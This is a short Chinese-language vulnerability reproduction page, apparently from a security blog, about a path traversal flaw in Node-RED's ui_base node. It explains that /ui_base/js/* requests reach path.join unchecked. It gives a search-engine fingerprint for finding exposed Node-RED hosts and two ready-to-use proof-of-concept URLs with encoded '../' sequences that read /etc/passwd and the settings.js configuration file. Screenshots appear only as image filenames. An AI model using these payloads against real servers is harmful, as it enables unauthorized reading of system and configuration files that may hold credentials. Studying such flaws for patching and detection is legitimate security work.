Node-RED ui_base 任意文件读取漏洞

漏洞描述

Node-RED 在/nodes/ui_base.js中,URL与’/ui_base/js/*’匹配,然后传递给path.join,缺乏对最终路径的验证会导致路径遍历漏洞,可以利用这个漏洞读取服务器上的敏感数据,比如settings.js。

漏洞影响

Node-RED

网络测绘

title=”Node-RED”

漏洞复现

访问页面

20240426103652883-image-20210701185722667.c8c7b2d7_2024-04-26_10-36-37 (1)

验证POC

/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/ui_base/js/..%2f..%2f..%2f..%2fsettings.js

20240426103735829-image-20210701185812622.9601ade0_2024-04-26_10-37-19 (1)

20240426103809391-image-20210704171045540.6cd978b7_2024-04-26_10-37-54 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容